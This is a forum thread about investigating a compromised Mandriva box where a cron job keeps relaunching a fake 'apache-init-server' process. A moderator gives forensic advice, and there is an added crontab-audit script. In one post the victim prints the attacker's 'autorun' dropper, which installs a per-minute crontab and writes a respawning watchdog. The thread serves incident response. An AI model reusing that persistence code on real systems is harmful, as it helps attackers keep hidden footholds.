LinuxQuestions.org
Old 09-26-2010, 03:02 AM   #1
jean-michel
Member
apache-init-server


Hello, I have the same problem. I have done all the traces asked, but I don't see how I can find the problem with these traces.
My distrib is Mandriva 2010.0 for i586,
kernel 2.6.31.13-desktop-1mnb.
I have no mail server.
netstat -pean | grep 80 shows connections... of course.

//These posts were moved from the 100s of apache-init-server thread to avoid confusion: the original thread's OP runs CentOS in a server setting and this thread's OP runs Mandriva in a client setting.

Last edited by unSpawn; 09-29-2010 at 10:10 AM.
 
Old 09-26-2010, 03:22 AM   #2
jean-michel
Member
Sorry, I continue.
I have about 5400 lines per hour in access_log.
locate has found one apache-init-server on an old partition.
My address is <some.address.foo.bar>.
I have several servers running (TeamSpeak, Mumble, FMS).
No clients connected at this moment.

Last edited by GrapefruiTgirl; 09-26-2010 at 05:50 AM. Reason: Moderator Edit: munged up that hostname for you
 
Old 09-26-2010, 05:34 AM   #3
unSpawn
Moderator
Quote:
Originally Posted by jean-michel View Post
I don't see how I can find the problem with these traces.
Saying "locate has found one apache-init-server on an old partition" gives us exactly nothing in terms of information. My reply to the OP ended with the question of attaching the plain text "data.txt" file because I do not expect everybody to know what to look for. I suggest you do the same.

* BTW, please edit your last post and remove your host name. No need to advertise it.
 
Old 09-28-2010, 08:19 AM   #4
jean-michel
Member
First, thanks for your efficient help.
I have stopped my Apache server at init, but the process was still there; in fact it is run from the cron table:
/var/tmp/vi.recover/update >/dev/null 2>&1

The update shell script runs another one called run;
run runs apache-init-server.

It seems that autorun is near the beginning:
cat autorun
Code:
#!/bin/sh
# record the directory the dropper was unpacked in
pwd > mech.dir
dir=$(cat mech.dir)
# install a per-minute cron entry for the current user that runs the "update" watchdog
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
# write the watchdog: if the pid in m.pid still answers a signal, do nothing;
# otherwise relaunch ./run (which starts apache-init-server)
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > update
chmod u+x update

Last edited by unSpawn; 09-28-2010 at 09:58 AM. Reason: //BB code tags
 
Old 09-28-2010, 03:38 PM   #5
unSpawn
Moderator
Thanks for posting information, but it would be better to also post the location and the information from running 'stat' on the files. Now let's focus on finding out what the entry point is, because that will dictate to you what steps you must take once the investigation is complete. If you're not good at correlating logs then my Logwatch suggestion might be a good start. Since we need to ensure this is "just" a web stack compromise, please also read and execute tasks from the CERT Intruder Detection Checklist and run 'rpm -Vva|grep -v "\.\{8\}">/dev/shm/rpmvfy.log;'. Please be verbose when posting; if logs are too big for this forum, please host them (pastebin or docs.google them), or if all else fails contact me by email to be able to drop them off.
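An added example (my own, not code from the thread or from either poster) of the audit unSpawn's advice amounts to: list every account's crontab, flag entries that execute something from /tmp, /var/tmp or /dev/shm (the pattern found in post #4), and stat what they point at. It assumes POSIX sh, crontab(1) with -u and GNU stat(1) with -c; the sample crontab at the bottom is constructed.

```shell
#!/bin/sh
# Added example, not from the thread: audit crontabs for entries that run
# something out of a world-writable scratch directory, as with
# /var/tmp/vi.recover/update relaunching apache-init-server above.
# Assumes POSIX sh, crontab(1) with -u, and GNU stat(1) with -c.

# Directories an unprivileged account can write to; extend as needed.
SUSPECT_DIRS='/tmp /var/tmp /dev/shm'

# Read crontab text on stdin, print only entries whose command references
# one of SUSPECT_DIRS. Comment and blank lines are ignored.
flag_tmp_cron_entries() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' |
    while IFS= read -r line; do
        for d in $SUSPECT_DIRS; do
            case "$line" in
                *"$d/"*) printf '%s\n' "$line"; break ;;
            esac
        done
    done
}

# For each flagged line, show owner, mode and mtime of the referenced file
# (the stat output asked for above). A missing file is reported, not fatal.
stat_flagged() {
    while IFS= read -r line; do
        printf 'CRON: %s\n' "$line"
        path=$(printf '%s\n' "$line" |
               grep -oE '/(tmp|var/tmp|dev/shm)/[^[:space:]>]*' | head -n 1)
        if [ -n "$path" ]; then
            stat -c 'FILE: %n owner=%U mode=%a mtime=%y' "$path" 2>/dev/null ||
                printf 'FILE: %s (missing: already cleaned up?)\n' "$path"
        fi
    done
}

# Walk every account's crontab (needs root); runs only with --scan.
scan_all_users() {
    cut -d: -f1 /etc/passwd | while IFS= read -r u; do
        crontab -u "$u" -l 2>/dev/null | flag_tmp_cron_entries |
            sed "s/^/$u: /" | stat_flagged
    done
}

# Constructed sample crontab mirroring the entry found in the thread.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/updatedb
* * * * * /var/tmp/vi.recover/update >/dev/null 2>&1
30 4 * * 0 /home/jm/backup.sh'

if [ "${1:-}" = "--scan" ]; then scan_all_users; fi
```

Run it as root with --scan on the live box; since crontab -r only clears the entry, the mtime of the flagged files still brackets the time window to search in the web logs.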
 
Old 09-29-2010, 03:51 AM   #6
jean-michel
Member
Thanks for the advice, but I am sorry, I clear the logs very often and I don't have the one corresponding to the file creation in the vi.recover folder.
What is the use of rpm -Vva | grep ...? For my knowledge.
http://jeanmichel.gens.free.fr/divers/linux/rpmvfy.log
 
Old 09-29-2010, 03:54 PM   #7
unSpawn
Moderator
'man rpm': verify. Create a list of files to investigate attributes. Note it doesn't handle files not known to the RPMDB.
 
Old 09-30-2010, 05:05 AM   #8
jean-michel
Member
Thank you again. I will keep in touch if I have some news; I keep investigating.
 
Old 09-30-2010, 03:27 PM   #9
unSpawn
Moderator
During investigation you could stop the Cron daemon or in Bash deny any user from running crontabs by issuing '$>/etc/cron.allow'.
 
Old 10-01-2010, 01:50 AM   #10
jean-michel
Member
Yes, I did it when I read the scripts,
with crontab -r.
No trouble any more.
 
Old 10-03-2010, 06:00 AM   #11
unSpawn
Moderator
Quote:
Originally Posted by jean-michel View Post
No trouble any more.
Until you have found out how the attacker abused your system you have not solved the problem. Please respond by reading and executing tasks from the CERT Intruder Detection Checklist and post back as verbosely as possible.
 